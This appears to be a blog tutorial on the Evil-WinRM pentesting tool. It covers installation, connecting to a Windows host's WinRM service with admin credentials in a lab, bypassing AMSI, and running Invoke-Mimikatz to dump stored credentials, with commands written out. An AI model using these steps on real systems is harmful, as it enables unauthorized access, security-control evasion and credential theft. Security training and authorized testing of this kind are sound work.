In this post we will discuss the most
famous framework for PS Remote shell hacking tool named as “Evil-Winrm”. It is
an opensource tool which is available on GitHub for winrm
penetration testing.
Table
of Content
·
Evil-winrm
·
Features
·
Installation
·
Load PowerShell scripts
·
Pass the Hash
·
Install using its Docker image
Evil-winrm
This program can be used on any
Microsoft Windows Servers with this feature enabled (usually at port 5985), of
course only if you have credentials and permissions to use it. So we can say
that it could be used in a post-exploitation hacking/pentesting phase. The
purpose of this program is to provide nice and easy-to-use features for
hacking. It can be used with legitimate purposes by system administrators as
well but the most of its features are focused on hacking/pentesting stuff.
Features
§ Compatible to Linux and Windows client systems
§ Load in memory Powershell scripts
§ Load in memory dll files bypassing some AVs
§ Load in memory C# (C Sharp) assemblies bypassing some AVs
§ Load x64 payloads generated with awesome donut technique
§ AMSI Bypass
§ Pass-the-hash support
§ Kerberos auth support
§ SSL and certificates support
§ Upload and download files showing progress bar
§ List remote machine services without privileges
§ Command History
§ WinRM command completion
§ Local files completion
§ Colorization on prompt and output messages (can be disabled optionally)
§ Docker support (prebuilt images available at Dockerhub)
§ Trap capturing to avoid accidental shell exit on Ctrl+C
Installation
In post, we have discussed two easy
method to install winrm in your kali Linux, you will find more method for
installation from GitHub.
With the help of Ruby gem, you can
direct install the evil-winrm, it will automatically install all dependency in
your machine by executing following command.
gem install evil-winrm
once it will get installed you can pull
its HELP option by typing ‘evil-winrm’ that will display the syntax and
other operators for executing evil-winrm against windows remote management
service.
Now using evil-winrm we try to access
remote machine shell by connecting through port 5985 open for winrm. As result,
it will give the access of victim shell by providing its Powershell as given
below.
Syntax: evil-winrm -i -u -p <’password’>
evil-winrm -i 192.168.1.105 -u
administrator -p 'Ignite@987'
It will not only provide shell of the
host machine but also provide menu to load function such as Invoke-Binary,
Dll-Loader, Donut-Loader and Bypass-4MSI.
So we have some pen testing powershell
script in the /root/powershell and we can upload these ps1 script through evil
winrm on the host machine.
The .PS1 scripts must be in the path set
at -s argument and execute this as given below:
Syntax: evil-winrm -i -u -p <’password’> -s
evil-winrm -i 192.168.1.105 -u
administrator -p 'Ignite@987' -s /root/powershell
Type menu again and see the loaded
functions and use Bypass 4MSI then Invoke the script. Here we have tried to
upload mimikatz PowerShell script to dump stored credential.
menu
Bypass 4MSI
Invoke-Mimikatz.ps1
Invoke-Mimikatz
As result, it has dumped all the
credential of the Windows Server. 😈
It has one more feature which allow you
to conduct Pass the HASH attack and as result it give the shell of the host
machine.
Install
using its Docker image
This is very easy and convenient method
to install winrm on your attacking machine and simultaneously provide the shell
of the victim machine by compromising it winrm service. Only you need to
execute following command.
docker run --rm -ti --name
evil-winrm oscarakaelvis/evil-winrm -i
192.168.1.105 -u Administrator -p 'Ignite@987'
0 comments:
Post a Comment